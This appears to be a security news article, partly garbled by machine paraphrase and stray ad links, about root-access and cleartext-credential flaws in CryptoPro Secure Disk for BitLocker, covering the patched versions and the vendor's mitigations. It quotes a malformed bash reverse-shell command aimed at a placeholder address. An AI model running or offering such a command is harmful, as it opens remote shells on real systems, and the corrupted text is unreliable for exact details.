Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft

CPSD CryptoPro Secure Disk for BitLocker Vulnerabilities Numerous flaws have been found in the popular encryption program CryptoPro Secure Disk (CPSD) for BitLocker This article explores disk cpsd bitlocker. . An attacker with physical access to a device could be able to obtain persistent root access and steal sensitive credentials thanks to these vulnerabilities.

Learn more Patch management for security Tools for digital forensics Safe coding techniques The problems that SEC security researchers found Important risks are highlighted by Vulnerability Lab for businesses that depend on this software to protect their data. Details of CVE CVSS CVE-2025-10010 N/A Root code execution is made possible by integrity bypass. N/A N/A Credentials are exposed by cleartext /tmp data. Bypassing Integrity Validation The integrity validation bypass is the first vulnerability, identified as CVE-2025-10010.

After authenticating users with a minimal Linux operating system, CryptoPro Secure Disk uses BitLocker to decrypt the Windows partition. Anyone who can physically access the hard drive or boot the system from an external medium can access this Linux system, which is located on an unencrypted partition. Although the system verifies files using the Integrity Measurement Architecture (IMA) of the Linux kernel, researchers discovered that IMA does not validate some configuration files.

bash -c "exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 \&1' & An attacker can run arbitrary code with root privileges by altering these files. This might make it possible for them to install a backdoor and watch or retrieve data while it's running without causing any system errors.

Versions of the Product at Risk CPSD CryptoPro Secure Disk < 7.6.6 / < 7.7.1 7.6.6 / 7.7.1 Fixed Versions Sensitive Data Storage in ClearText Sensitive information stored in plain text is the second problem. CryptoPro Secure Disk provides an online support feature that connects to a predetermined network in case users forget their login credentials. The system stores required secrets, including passwords and certificates, in cleartext inside the temporary "/tmp" folder in order to enable this connection, according to SEC Consult.

Learn more Platforms for threat intelligence Protection against data breaches Cybersecurity An attacker can easily read these files if they have already obtained access to the Linux environment, possibly as a result of the first vulnerability.

Cleartext certificate credentials allow 802.1X bypass and reveal WLAN access (source: sec-consult). The infrastructure of the company could then be further jeopardized if this information is used to gain access to internal networks or get around network access controls. After being informed of these problems in June 2025, the vendor, CPSD, has since released patches.

The vulnerabilities are fixed in versions 7.6.6 and 7.7.1. Businesses that use CryptoPro Secure Disk should update their software right away. The vendor suggests encrypting the PBA partition, a feature that has been available since version 7.6.0, if updating cannot be done right away. This encryption is enabled by default as of version 7.7, reducing the possibility of unwanted file changes.

In order to find and fix any additional potential flaws, SEC Consult also suggests that businesses perform comprehensive security assessments of their encryption systems.

Set ZeroOwl as a Preferred Source in Google to Receive More Instant Updates from LinkedIn and X.